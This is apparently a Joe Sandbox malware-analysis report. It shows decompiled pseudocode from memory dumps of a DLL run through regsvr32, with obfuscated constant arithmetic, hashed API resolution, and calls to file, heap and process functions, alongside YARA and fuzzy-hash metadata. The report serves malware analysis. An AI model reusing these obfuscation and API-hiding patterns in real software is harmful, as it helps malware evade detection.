															_t402 =  *0x1008f224; // 0x0
															_t699 =  *0x1008f21c; // 0x0
															_t403 =  *0x1008f214; // 0x0
															_t264 = _t403 + 2; // 0x2
															_t1220 =  *0x1008f220; // 0x0
															_t702 =  *0x1008f218; // 0x0
															_t703 =  *0x1008f220; // 0x0
															_t404 =  *0x1008f220; // 0x0
															_t589 = _t588 + (_t703 - _t702 * _t702 * 0xf8 - _t403 - _t403 + _t404 - 0xf8) *  *0x1008f224 + (((1 - _t402) *  *0x1008f228 + _t264 * _t699 + _t403 * 2 - _t1220) * 0x7c + (_t699 + 0xffffff83) *  *0x1008f228) * 2 +  *((intOrPtr*)( *((intOrPtr*)(_t1301 + 0x7c)) + 0x3c));
															 *_t1088 = _t589;
															_t709 =  *0x1008f228; // 0x0
															_t406 =  *0x1008f224; // 0x0
															_t826 =  *0x1008f218; // 0x0
															_t274 = ((_t709 << 0x1e) - _t709 + _t406) * _t709 + 2; // 0x2
															_t407 =  *0x1008f21c; // 0x0
															 *((intOrPtr*)(_t589 + 0x34)) = _t945 + ((_t826 + _t274) * _t406 + (_t407 * _t407 + _t709 << 0x1e) - _t407 * _t407 + _t709 + ((_t826 << 0x1c) - _t826) * 4) * 4;
															_t413 =  *0x1008f21c; // 0x0
															_t828 =  *0x1008f220; // 0x0
															_t714 =  *0x1008f218; // 0x0
															_t715 =  *0x1008f224; // 0x0
															_t282 = _t715 + 2; // 0x2
															_t831 =  *0x1008f228; // 0x0
															_push(((_t413 - _t828 + _t714) * _t714 - (_t828 + _t715 * 2 << 1) - _t282 * _t831 + _t413 + _t413 * 4 << 6) + _t1088);
															_push( *((intOrPtr*)(_t1301 + 0x34)));
															_t600 =  *0x1008f218; // 0x0
															_t832 =  *0x1008f220; // 0x0
															_push(((_t600 * _t715 * _t715 + 1) *  *0x1008f220 + _t831 + _t715) * _t600 + _t413 + _t413 * 2 - _t831 + _t832 +  *((intOrPtr*)(_t1301 + 0x88)));
															_push( *((intOrPtr*)(_t1301 + 0x84)));
															_t415 = E100064F0();
															_t1301 = _t1301 + 0x30;
															if(_t415 == 0) {
																goto L40;
															} else {
																_t718 =  *0x1008f218; // 0x0
																_t416 =  *0x1008f228; // 0x0
																_t833 =  *0x1008f214; // 0x0
																_t1251 =  *0x1008f21c; // 0x0
																_t1253 =  *0x1008f21c; // 0x0
																_t612 = ((_t718 * _t416 *  *0x1008f224 + 1) * _t718 + _t833 *  *0x1008f220 *  *0x1008f224 + 4) *  *0x1008f224 - _t416 + (((_t718 * _t416 *  *0x1008f224 + 1) * _t718 + _t833 *  *0x1008f220 *  *0x1008f224 + 4) *  *0x1008f224 - _t416) * 2 + ((_t833 * _t833 + _t1251 * _t718) * _t1253 + (_t833 * _t833 + _t1251 * _t718) * _t1253 * 2 - 3) * _t1253 +  *((intOrPtr*)( *_t1088 + 0x34)) -  *((intOrPtr*)( *((intOrPtr*)(_t1301 + 0x10)) + 0x34));
																if(_t612 == 0) {
																	 *((intOrPtr*)(_t1088 + 0x18)) = 1;
																} else {
																	_push(_t833 * _t718 + _t612);
																	_t852 =  *0x1008f224; // 0x0
																	_push(((_t718 - _t1253 + _t852 + 1) *  *0x1008f228 + _t1253 * 2 - _t852 + ((_t718 - _t1253 + _t852 + 1) *  *0x1008f228 + _t1253 * 2 - _t852) * 2 << 6) + _t1088);
																	_t450 = E10007BF0();
																	_t622 =  *0x1008f214; // 0x0
																	_t736 =  *0x1008f220; // 0x0
																	_t451 =  *0x1008f21c; // 0x0
																	_t1259 =  *0x1008f228; // 0x0
																	_t1260 =  *0x1008f214; // 0x0
																	_t1301 = _t1301 + 8;
																	_t453 =  *0x1008f218; // 0x0
																	 *((intOrPtr*)(_t1088 + 0x18)) = _t450 + (_t622 *  *0x1008f218 * _t736 * _t736 + _t451 * _t451 - _t1259 + _t1260) *  *0x1008f224 - _t451 * _t736 + _t453 * 2;
																}
																_t834 =  *0x1008f218; // 0x0
																_t425 =  *0x1008f21c; // 0x0
																_t311 = _t834 + 1; // 0x1
																_t426 =  *0x1008f224; // 0x0
																_t312 = _t426 + 1; // 0x1
																_t313 = _t426 - 1; // -1
																_t839 =  *0x1008f228; // 0x0
																_push(((_t425 + _t311) *  *0x1008f214 - _t312 *  *0x1008f220 + _t313 * _t426 - _t839 << 7) + _t1088);
																_t427 = E10008140();
																_t1301 = _t1301 + 4;
																if(_t427 == 0) {
																	goto L40;
																} else {
																	_t840 =  *0x1008f220; // 0x0
																	_t726 =  *0x1008f228; // 0x0
																	_t428 =  *0x1008f218; // 0x0
																	_t843 =  *0x1008f214; // 0x0
																	_push((_t428 * _t428 + _t840 * _t726 *  *0x1008f224 * 2 - _t726 + _t843 + (_t428 * _t428 + _t840 * _t726 *  *0x1008f224 * 2 - _t726 + _t843) * 2 << 6) + _t1088);
																	_t435 = E10006CA0();
																	_t1301 = _t1301 + 4;
																	if(_t435 == 0) {
																		goto L40;
																	} else {
																		_t727 =  *0x1008f21c; // 0x0
																		_t436 = E10007AC0(_t1088 - (_t727 *  *0x1008f220 << 6));
																		_t1301 = _t1301 + 4;
																		if(_t436 != 0) {
																			_t730 =  *((intOrPtr*)( *_t1088 + 0x28));
																			if(_t730 == 0) {
																				 *((intOrPtr*)(_t1088 + 0x38)) = 0;
																				return _t1088;
																			} else {
																				if( *(_t1088 + 0x14) == 0) {
																					_t846 =  *0x1008f214; // 0x0
																					_t440 =  *0x1008f220; // 0x0
																					_t323 = _t846 + 1; // 0x1
																					_t324 = _t440 - 4; // -4
																					_t442 =  *0x1008f228; // 0x0
																					 *((intOrPtr*)(_t1088 + 0x38)) = _t730 + (_t323 *  *0x1008f21c + _t324 *  *0x1008f218 - _t440 + _t440 - _t442 + _t442 * 2 + _t846) * 4 + _t945;
																					return _t1088;
																				} else {
																					_t847 =  *0x1008f21c; // 0x0
																					_t1256 =  *0x1008f220; // 0x0
																					_t621 =  *0x1008f224; // 0x0
																					 *0x10092e5c = _t730 + (_t847 - _t1256 - _t621) * 2 + _t945;
																					 *((intOrPtr*)(_t1088 + 0x10)) = 1;
																					return _t1088;
																				}
																			}
																		} else {
																			goto L40;
																		}
																	}
																}
															}
														}
													} else {
														_t454 =  *0x1008f214; // 0x0
														_t858 =  *0x1008f218; // 0x0
														_t455 =  *0x1008f220; // 0x0
														_t1089 =  *0x1008f228; // 0x0
														 *((intOrPtr*)(_t1300 + 0x78))(_t945, 0, 0x8000 - ((_t455 * _t1089 + 1) * _t858 + _t676 + _t454 * _t454 * _t454 * _t858 * _t455 * _t1089 << 1), _t572);
														return 0;
													}
												} else {
													return _t468;
												}
											}
										} else {
											return 0;
										}
									} else {
										return 0;
									}
								} else {
									return 0;
								}
							} else {
								return 0;
							}
						} else {
							return _t354;
						}
					} else {
						return 0;
					}
				} else {
					return _t348;
				}
			}

0x10005203
0x1000520c
0x10005212
0x10005221
0x1000522d
0x10005233
0x10005250
0x10005255
0x10005264
0x1000526c
0x10005291
0x100052a4
0x100052a9
0x100052ae
0x100052b8
0x100052bd
0x100052c8
0x100052db
0x100052f5
0x10005301
0x10005306
0x1000530f
0x10005363
0x1000537f
0x10005384
0x10005389
0x10005393
0x10005399
0x100053a1
0x100053a9
0x100053b2
0x100053be
0x100053c1
0x100053cd
0x100053e3
0x100053e9
0x100053f6
0x100053fa
0x10005412
0x1000541b
0x10005427
0x1000542d
0x10005438
0x10005444
0x10005456
0x10005465
0x10005476
0x1000548c
0x100054b4
0x100054c0
0x100054c8
0x100054cf
0x100054d4
0x100054d8
0x100054da
0x100054de
0x100054e2
0x100054ee
0x100054f4
0x10005511
0x10005526
0x1000554d
0x10005551
0x10005555
0x10005697
0x1000555b
0x10005560
0x1000558e
0x10005599
0x100055a5
0x100055ae
0x10005602
0x1000562d
0x100055b0
0x100055d4
0x100055f7
0x100055f7
0x1000563b
0x10005675
0x1000563d
0x1000563d
0x10005657
0x1000566f
0x1000566f
0x10005686
0x10005687
0x1000568b
0x1000568b
0x10005695
0x100056ab
0x100056b1
0x100056b7
0x100056bc
0x100056c2
0x100056c8
0x100056ce
0x100056d4
0x100056f7
0x100056fb
0x10005709
0x1000570d
0x10005713
0x10005716
0x10005719
0x1000571c
0x1000573c
0x1000573f
0x10005750
0x1000575c
0x10005776
0x10005780
0x1000578f
0x100057aa
0x100057b9
0x100057e1
0x100057e5
0x100057e9
0x100057eb
0x100057f3
0x1000581b
0x10005827
0x10005848
0x1000584a
0x10005852
0x10005880
0x10005886
0x1000589d
0x100058b1
0x100058bf
0x100058cc
0x100058d5
0x100058e8
0x100058fa
0x10005902
0x10005911
0x10005938
0x1000593a
0x1000593f
0x100059d8
0x00000000
0x10005945
0x10005945
0x1000594a
0x10005954
0x1000595c
0x1000596c
0x10005972
0x10005974
0x1000597a
0x1000598a
0x10005990
0x100059a1
0x100059c3
0x100059c7
0x100059c9
0x100059ce
0x100059dc
0x100059dc
0x100059e2
0x100059e9
0x100059f6
0x10005a00
0x10005a04
0x10005a16
0x10005a22
0x10005a2a
0x10005a36
0x10005a3b
0x10005a4e
0x10005a5c
0x10005a79
0x10005a83
0x10005a8f
0x10005a95
0x10005aa2
0x10005aa4
0x10005af7
0x10005afa
0x10005b00
0x10005b0e
0x10005b31
0x10005b33
0x10005b3a
0x10005b3f
0x10005b46
0x10005b4d
0x10005b50
0x10005b53
0x10005b56
0x10005b5c
0x10005b6b
0x10005b72
0x10005b81
0x10005b8a
0x10005b92
0x10005ba3
0x10005ba6
0x10005bac
0x10005bc8
0x10005bd9
0x10005be9
0x10005c04
0x10005c09
0x10005c0e
0x10006006
0x10006006
0x10006007
0x10006018
0x10005c14
0x10005c14
0x10005c19
0x10005c2a
0x10005c59
0x10005c6f
0x10005c79
0x10005c83
0x10005c98
0x10005ca5
0x10005ca9
0x10005caf
0x10005cbc
0x10005cbe
0x10005cda
0x10005ce0
0x10005cfc
0x10005d02
0x10005d07
0x10005d14
0x10005d20
0x10005d28
0x10005d42
0x10005d53
0x10005d5f
0x10005d7e
0x10005d80
0x10005d82
0x10005d88
0x10005d94
0x10005d9f
0x10005da6
0x10005dc7
0x10005dca
0x10005dcf
0x10005dd5
0x10005de4
0x10005ded
0x10005df4
0x10005e0c
0x10005e11
0x10005e12
0x10005e3a
0x10005e4b
0x10005e4c
0x10005e4d
0x10005e52
0x10005e57
0x00000000
0x10005e5d
0x10005e5d
0x10005e63
0x10005e6a
0x10005e92
0x10005eab
0x10005ec9
0x10005ecc
0x10005f53
0x10005ed2
0x10005ed9
0x10005eda
0x10005ef8
0x10005ef9
0x10005efe
0x10005f04
0x10005f16
0x10005f28
0x10005f30
0x10005f38
0x10005f44
0x10005f4e
0x10005f4e
0x10005f5a
0x10005f60
0x10005f65
0x10005f69
0x10005f75
0x10005f81
0x10005f89
0x10005f96
0x10005f97
0x10005f9c
0x10005fa1
0x00000000
0x10005fa3
0x10005fa3
0x10005fa9
0x10005faf
0x10005fc6
0x10005fd8
0x10005fd9
0x10005fde
0x10005fe3
0x00000000
0x10005fe5
0x10005fe5
0x10005ffa
0x10005fff
0x10006004
0x1000601b
0x10006020
0x1000609d
0x100060ad
0x10006022
0x10006027
0x1000605a
0x10006060
0x10006065
0x10006068
0x1000607f
0x10006093
0x1000609c
0x10006029
0x10006029
0x1000602f
0x10006035
0x10006045
0x1000604a
0x10006059
0x10006059
0x10006027
0x00000000
0x00000000
0x00000000
0x10006004
0x10005fe3
0x10005fa1
0x10005e57
0x10005aa6
0x10005aa6
0x10005aae
0x10005abd
0x10005ac2
0x10005ae6
0x10005af6
0x10005af6
0x100059d7
0x100059d7
0x100059d7
0x100059ce
0x10005820
0x10005826
0x10005826
0x100054b9
0x100054bf
0x100054bf
0x1000546a
0x10005470
0x10005470
0x1000543d
0x10005443
0x10005443
0x10005392
0x10005392
0x10005392
0x100052fa
0x10005300
0x10005300
0x100052b7
0x100052b7
0x100052b7

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0fcb66af06d28b384ef75b475c25248cb6abd66cb35e16e54c34d03bfb9029e
Instruction ID: 4f6872e9742785882cce27a1d3e455d113c6d1a715b56a092b8a3cedd8a75e75
Opcode Fuzzy Hash: a0fcb66af06d28b384ef75b475c25248cb6abd66cb35e16e54c34d03bfb9029e
Instruction Fuzzy Hash: 6DA2B436A4432A8FD309DF6CDEC15A5F7E9FBC8314B15422FDA048B366E670B9158B84

Uniqueness

Uniqueness Score: -1.00%

Function 10020212 Relevance: 6.1, APIs: 4, Instructions: 53
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E10020212() {
				signed int _t15;
				void* _t17;
				void* _t19;
				void* _t25;
				signed int _t26;
				void* _t27;
				intOrPtr* _t29;

				_t15 =  *0x100967a0; // 0x1
				_t26 =  *0x10096784; // 0x10
				if(_t15 != _t26) {
					L3:
					_t27 =  *0x100967a4; // 0xda07d0
					_t29 = _t27 + (_t15 + _t15 * 4) * 4;
					_t17 = RtlAllocateHeap( *0x100967a8, 8, 0x41c4); // executed
					 *(_t29 + 0x10) = _t17;
					if(_t17 == 0) {
						L6:
						return 0;
					}
					_t19 = VirtualAlloc(0, 0x100000, 0x2000, 4); // executed
					 *(_t29 + 0xc) = _t19;
					if(_t19 != 0) {
						 *(_t29 + 8) =  *(_t29 + 8) | 0xffffffff;
						 *_t29 = 0;
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *0x100967a0 =  *0x100967a0 + 1;
						 *( *(_t29 + 0x10)) =  *( *(_t29 + 0x10)) | 0xffffffff;
						return _t29;
					}
					HeapFree( *0x100967a8, 0,  *(_t29 + 0x10));
					goto L6;
				}
				_t2 = _t26 * 4; // 0x60
				_t25 = HeapReAlloc( *0x100967a8, 0,  *0x100967a4, _t26 + _t2 + 0x50 << 2);
				if(_t25 == 0) {
					goto L6;
				}
				 *0x10096784 =  *0x10096784 + 0x10;
				 *0x100967a4 = _t25;
				_t15 =  *0x100967a0; // 0x1
				goto L3;
			}

0x10020212
0x10020217
0x10020223
0x10020255
0x10020255
0x1002026b
0x1002026e
0x10020276
0x10020279
0x100202a5
0x00000000
0x100202a5
0x10020288
0x10020290
0x10020293
0x100202a9
0x100202ad
0x100202af
0x100202b2
0x100202bb
0x00000000
0x100202be
0x1002029f
0x00000000
0x1002029f
0x10020225
0x1002023a
0x10020242
0x00000000
0x00000000
0x10020244
0x1002024b
0x10020250
0x00000000

APIs

HeapReAlloc.KERNEL32(00000000,00000060,?,00000000,1001FFDA,?,?,?), ref: 1002023A
RtlAllocateHeap.NTDLL(00000008,000041C4,?,00000000,1001FFDA,?,?,?), ref: 1002026E
VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 10020288
HeapFree.KERNEL32(00000000,?), ref: 1002029F

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Heap$Alloc$AllocateFreeVirtual
String ID:
API String ID: 1005975451-0
Opcode ID: 4f6a91b74f2fe9ced474c61b5565440cc2b7235fc27ca39e7ddbfe6c8fa8c948
Instruction ID: 03b982436c7cc35bf5a86178184bb67ba7f8593f364eefc6df4d2204ac6421ad
Opcode Fuzzy Hash: 4f6a91b74f2fe9ced474c61b5565440cc2b7235fc27ca39e7ddbfe6c8fa8c948
Instruction Fuzzy Hash: 88113D30204321EFEB28CF99DCC9D1ABBB6FB88798790091BF159C61B1C7719845CB00

Uniqueness

Uniqueness Score: -1.00%

Function 003C9A53 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 78
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E003C9A53(long __ecx, void* __edx, WCHAR* _a4, long _a8, intOrPtr _a12, long _a16, intOrPtr _a20, intOrPtr _a28, long _a32, intOrPtr _a40, intOrPtr _a44) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t59;
				void* _t71;
				signed int _t73;
				signed int _t74;
				signed int _t75;
				long _t85;

				_push(_a44);
				_t85 = __ecx;
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(0);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E003C2528(_t59);
				_v28 = 0xef6a1;
				_v24 = 0xe631;
				_v20 = 0x7a329;
				_v16 = 0xa016b8;
				_t73 = 0x60;
				_v16 = _v16 / _t73;
				_t74 = 0x3a;
				_v16 = _v16 / _t74;
				_v16 = _v16 + 0xffff6e82;
				_v16 = _v16 ^ 0xfff3db86;
				_v12 = 0xbda2be;
				_v12 = _v12 >> 3;
				_v12 = _v12 + 0xffffa315;
				_v12 = _v12 + 0xffff64e8;
				_v12 = _v12 ^ 0x00128468;
				_v8 = 0x213d2c;
				_v8 = _v8 + 0xffff612c;
				_v8 = _v8 ^ 0x25eea302;
				_t75 = 0x49;
				_v8 = _v8 / _t75;
				_v8 = _v8 ^ 0x0086bb13;
				E003C6F64(0xa971fe6d, _t75, _t75, 0xbfd2d08a, 0x13d);
				_t71 = CreateFileW(_a4, _t85, _a16, 0, _a8, _a32, 0); // executed
				return _t71;
			}

0x003c9a5b
0x003c9a60
0x003c9a62
0x003c9a65
0x003c9a66
0x003c9a69
0x003c9a6c
0x003c9a6d
0x003c9a70
0x003c9a73
0x003c9a76
0x003c9a79
0x003c9a7d
0x003c9a7e
0x003c9a83
0x003c9a8d
0x003c9a96
0x003c9a9d
0x003c9aa9
0x003c9aae
0x003c9ab6
0x003c9abb
0x003c9ac0
0x003c9ac7
0x003c9ace
0x003c9ad5
0x003c9ad9
0x003c9ae0
0x003c9ae7
0x003c9aee
0x003c9af5
0x003c9afc
0x003c9b06
0x003c9b0e
0x003c9b11
0x003c9b2d
0x003c9b44
0x003c9b4b

APIs

CreateFileW.KERNEL32(00128468,?,0000E631,00000000,FFF3DB86,?,00000000), ref: 003C9B44

Strings

,=!, xrefs: 003C9AEE

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: ,=!
API String ID: 823142352-3902226038
Opcode ID: db60e815c13fa30db4f4f92ee864ea71fe6f1c9fccfb7085071fbef99af59582
Instruction ID: f27b799711c718d95fa5c4d1858d18a4665a444cdb25812b05686d0e00e44d9b
Opcode Fuzzy Hash: db60e815c13fa30db4f4f92ee864ea71fe6f1c9fccfb7085071fbef99af59582
Instruction Fuzzy Hash: 67312472D00208BFDF15CFA6DC498DEBBB6EB89314F108189F914A6160D7B29A219F90

Uniqueness

Uniqueness Score: -1.00%

Function 003C3182 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E003C3182(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4, intOrPtr _a8) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t40;
				int _t48;
				signed int _t50;
				struct _SHFILEOPSTRUCTW* _t55;

				_push(_a8);
				_t55 = __edx;
				_push(_a4);
				_push(__edx);
				E003C2528(_t40);
				_v20 = _v20 & 0x00000000;
				_v32 = 0x8d7e;
				_v28 = 0xd5018;
				_v24 = 0x83984;
				_v16 = 0x378328;
				_t50 = 0x6f;
				_v16 = _v16 / _t50;
				_v16 = _v16 + 0xfffffb56;
				_v16 = _v16 ^ 0x000c4e61;
				_v12 = 0x181ca0;
				_v12 = _v12 + 0x8cdf;
				_v12 = _v12 + 0x769a;
				_v12 = _v12 << 0xc;
				_v12 = _v12 ^ 0x920510f8;
				_v8 = 0xfa7ef3;
				_v8 = _v8 << 4;
				_v8 = _v8 + 0x11ff;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x01f94c60;
				E003C6F64(0x3936eb73, _t50, _t50, 0xfd28539d, 0x2ac);
				_t48 = SHFileOperationW(_t55); // executed
				return _t48;
			}

0x003c3189
0x003c318c
0x003c318e
0x003c3191
0x003c3193
0x003c3198
0x003c319f
0x003c31a8
0x003c31af
0x003c31b6
0x003c31c2
0x003c31ca
0x003c31cd
0x003c31d4
0x003c31db
0x003c31e2
0x003c31e9
0x003c31f0
0x003c31f4
0x003c31fb
0x003c3202
0x003c3206
0x003c320d
0x003c3211
0x003c322d
0x003c3236
0x003c323c

APIs

SHFileOperationW.SHELL32 ref: 003C3236

Strings

s69, xrefs: 003C3228

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID: s69
API String ID: 3080627654-3363742768
Opcode ID: 700f7503ae571a097b6598476fe53e4c2e283806177926624582366c2e511042
Instruction ID: e67f44f57d8e66287f5318969e42c001f18ff636c9d466b5ad9803aa3cb2a43a
Opcode Fuzzy Hash: 700f7503ae571a097b6598476fe53e4c2e283806177926624582366c2e511042
Instruction Fuzzy Hash: 971143B6D00308BBEB05EFD5C84A9DEBBB4FF51718F10808CE42466281E7B91B189F90

Uniqueness

Uniqueness Score: -1.00%

Function 003C2DDF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E003C2DDF(void* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				void* _t36;
				intOrPtr* _t44;
				void* _t45;
				signed int _t47;

				E003C2528(_t36);
				_v16 = 0x252a0;
				_v16 = 0xfec68f;
				_v16 = _v16 + 0xc2fd;
				_v16 = _v16 ^ 0x00fefa21;
				_v8 = 0x245331;
				_v8 = _v8 ^ 0xfeaa7e33;
				_t47 = 0x30;
				_v8 = _v8 / _t47;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x00558f20;
				_v12 = 0x107ae4;
				_v12 = _v12 * 0x15;
				_v12 = _v12 << 0xb;
				_v12 = _v12 ^ 0xd0a43417;
				_t44 = E003C6F64(0x54e8d29f, _t47, _t47, 0xbfd2d08a, 0x1d3);
				_t45 =  *_t44(_a12, 0, _a20, 0x28, __ecx, __edx, 0x28, 0, _a12, _a16, _a20, _a24); // executed
				return _t45;
			}

0x003c2df7
0x003c2dfc
0x003c2e06
0x003c2e0f
0x003c2e16
0x003c2e1d
0x003c2e24
0x003c2e30
0x003c2e38
0x003c2e3b
0x003c2e3f
0x003c2e46
0x003c2e5d
0x003c2e60
0x003c2e64
0x003c2e74
0x003c2e86
0x003c2e8b

APIs

SetFileInformationByHandle.KERNEL32(?,00000000,?,00000028), ref: 003C2E86

Strings

1S$, xrefs: 003C2E1D

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID: 1S$
API String ID: 3935143524-2004729075
Opcode ID: 36233d8eae62c5799e6b21827bc8b8880b921a3b052657da0ea28c69f1be97bf
Instruction ID: 6605ad51addff3b36da53841dda6a7beeb5045a0ca60e5328d292f95516d6860
Opcode Fuzzy Hash: 36233d8eae62c5799e6b21827bc8b8880b921a3b052657da0ea28c69f1be97bf
Instruction Fuzzy Hash: 7C115871D00208FBEF05DFE0D94AA9EBFB1EB44704F108098FA10BA190D7B19B649F80

Uniqueness

Uniqueness Score: -1.00%

Function 003CFE66 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E003CFE66() {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _t39;

				_v16 = 0xccf88;
				_v16 = 0x2b5d47;
				_t39 = 0x3f;
				_v16 = _v16 * 0x1b;
				_v16 = _v16 ^ 0x0490d732;
				_v12 = 0x8a9628;
				_v12 = _v12 / _t39;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 >> 8;
				_v12 = _v12 ^ 0x000e1985;
				_v8 = 0x12da78;
				_v8 = _v8 ^ 0xc30f85a0;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 ^ 0x192cbcc7;
				_v8 = _v8 ^ 0x192bc050;
				E003C6F64(0x96ef5de3, _t39, _t39, 0xbfd2d08a, 0x39);
				ExitProcess(0);
			}

0x003cfe6c
0x003cfe75
0x003cfe82
0x003cfe8a
0x003cfe8d
0x003cfe94
0x003cfea1
0x003cfea4
0x003cfea8
